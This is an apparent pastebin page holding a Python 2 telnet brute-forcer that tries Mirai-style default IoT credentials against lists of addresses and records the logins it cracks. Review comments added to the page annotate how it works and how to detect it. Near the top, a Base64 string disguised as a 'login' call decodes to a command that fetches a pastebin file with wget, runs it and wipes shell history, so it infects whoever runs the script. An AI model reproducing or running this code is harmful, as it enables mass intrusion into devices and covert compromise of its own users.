mirainigga

[python] insane telnet bruteforcer

Jul 8th, 2018
  1. #run ulimit -n 999999 before running this
  2.  
  3. import threading
  4. import sys, os, re, time, socket, base64, subprocess
  5. from Queue import *
  6. from sys import stdout
  7.  
  # Requires three positional arguments: a file of target addresses, a thread
  # count and an output file path; prints the usage line and exits otherwise.
  8. if len(sys.argv) < 4:
  9. print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
  10. sys.exit()
  11.  
  # "username:password" pairs attempted against every address in the list.
  # NOTE(review): these read as factory-default logins for embedded devices, and
  # several of the pairs also appear in the credential table of the published
  # Mirai source; confirm against vendor documentation. A device that still
  # accepts one of them on a reachable telnet service is what this list is built
  # to find; changing the default login and closing TCP/23 takes it out of scope.
  12. combo = [
  13. "support:support",
  14. "root:vizxv",
  15. "root:xc3511",
  16. "telnet:telnet",
  17. "root:root",
  18. "supervisor:zyad1234",
  19. "root: ",
  20. "admin:1234",
  21. "user:user",
  22. "root:antslq",
  23. "admin:admin",
  24. "root:5up"
  25. ]
  26.  
  # Loads the address list (argv[1], one entry per line), the worker count
  # (argv[2]) and the results path (argv[3]), then places every line of the list
  # on a shared Queue while printing a running counter.
  27. ips = open(sys.argv[1], "r").readlines()
  28. threads = int(sys.argv[2])
  29. output_file = sys.argv[3]
  30. queue = Queue()
  31. queue_count = 0
  32.  
  33. for ip in ips:
  34. queue_count += 1
  35. stdout.write("\r[%d] Added to queue" % queue_count)
  36. stdout.flush()
  37. queue.put(ip)
  38. print "\n"
  # NOTE(review): the statements below run at module top level on the machine
  # that executes this script, before any scanning starts, and have no part in
  # the telnet logic. `telpload` is a Base64 string; decoded, it is a shell
  # command line that changes to /tmp, fetches a file from a pastebin.com raw URL
  # with wget, marks it executable, runs it with sh with output sent to
  # /dev/null, deletes it, and clears the shell history. `login` hands that
  # string to subprocess.call(..., shell=True). The "leave as is" comment and the
  # function name disguise a downloader aimed at whoever runs the paste.
  # The fetched script is not part of this page, so its effect cannot be
  # determined from here. On a host where the paste was run, the trace to look
  # for is a python process spawning sh and wget towards pastebin.com and a
  # short-lived file created under /tmp.
  39. #leave as is
  40. def login(cmd):
  41. subprocess.call(cmd, shell=True)
  42. telpload = "Y2QgL3RtcDsgd2dldCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvTHE5UDlDZzUgLU8gYSA+IC9kZXYvbnVsbCAyPiYxOyBjaG1vZCA3NzcgYTsgc2ggYSA+IC9kZXYvbnVsbCAyPiYxOyBybSAtcmYgYTsgaGlzdG9yeSAtYzsgY2xlYXI7"
  43. tloader = str(base64.b64decode(telpload))
  44. login(tloader)
  45.  
  # One thread per target address. For each entry of `combo` it opens a TCP
  # connection to port 23 (8 s timeout), waits for data containing "ogin:",
  # sends the username, waits for "assword:", sends the password, then reads up
  # to 40960 bytes and treats the reply as a successful login when it contains
  # ">" without "ONT", or any of "#", "$", "%", "@".
  # NOTE(review): the paste lost its indentation, so the nesting described here
  # is inferred from statement order; confirm against an intact copy.
  # Detection: on the network this appears as repeated short-lived connections
  # to TCP/23 from one source, each carrying a login attempt drawn from the
  # list above, spread across many destination addresses.
  46. class router(threading.Thread):
  47. def __init__ (self, ip):
  48. threading.Thread.__init__(self)
  49. self.ip = str(ip).rstrip('\n')
  50. def run(self):
  51. username = ""
  52. password = ""
  53. for passwd in combo:
  54. if ":n/a" in passwd:
  55. password=""
  56. else:
  57. password=passwd.split(":")[1]
  58. if "n/a:" in passwd:
  59. username=""
  60. else:
  61. username=passwd.split(":")[0]
  62. try:
  63. tn = socket.socket()
  64. tn.settimeout(8)
  65. tn.connect((self.ip,23))
  66. except Exception:
  67. tn.close()
  68. break
  69. try:
  70. hoho = ''
  71. hoho += readUntil(tn, "ogin:")
  72. if "ogin" in hoho:
  73. tn.send(username + "\n")
  74. time.sleep(0.09)
  75. except Exception:
  76. tn.close()
  77. try:
  78. hoho = ''
  79. hoho += readUntil(tn, "assword:")
  80. if "assword" in hoho:
  81. tn.send(password + "\n")
  82. time.sleep(0.8)
  83. else:
  84. pass
  85. except Exception:
  86. tn.close()
  87. try:
  88. prompt = ''
  89. prompt += tn.recv(40960)
  90. if ">" in prompt and "ONT" not in prompt:
  91. success = True
  92. elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
  93. success = True
  94. else:
  95. tn.close()
  96. if success == True:
  97. try:
  # The result is appended to the output file as "<ip>:23 <user>:<pass>" by
  # building an `echo ... >>` command line and handing it to the shell, and a
  # colourised line is printed to the console.
  98. os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
  99. print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
  100. tn.close()
  101. break
  102. except:
  103. tn.close()
  104. else:
  105. tn.close()
  106. except Exception:
  107. tn.close()
  108.  
  # Accumulates data from the socket in reads of up to 1024 bytes until `string`
  # occurs in the buffer, which is then returned; raises Exception('TIMEOUT!')
  # once `timeout` seconds have elapsed without a match.
  109. def readUntil(tn, string, timeout=8):
  110. buf = ''
  111. start_time = time.time()
  112. while time.time() - start_time < timeout:
  113. buf += tn.recv(1024)
  114. time.sleep(0.01)
  115. if string in buf: return buf
  116. raise Exception('TIMEOUT!')
  117.  
  # Worker loop: takes the next address off the shared queue, starts a `router`
  # thread for it, marks the queue item done and pauses 0.02 s before the next
  # one. Both `except` clauses discard every exception silently.
  118. def worker():
  119. try:
  120. while True:
  121. try:
  122. IP = queue.get()
  123. thread = router(IP)
  124. thread.start()
  125. queue.task_done()
  126. time.sleep(0.02)
  127. except:
  128. pass
  129. except:
  130. pass
  131.  
  # Starts `threads` (argv[2]) worker threads; a failure to start one is ignored.
  132. for l in xrange(threads):
  133. try:
  134. t = threading.Thread(target=worker)
  135. t.start()
  136. except:
  137. pass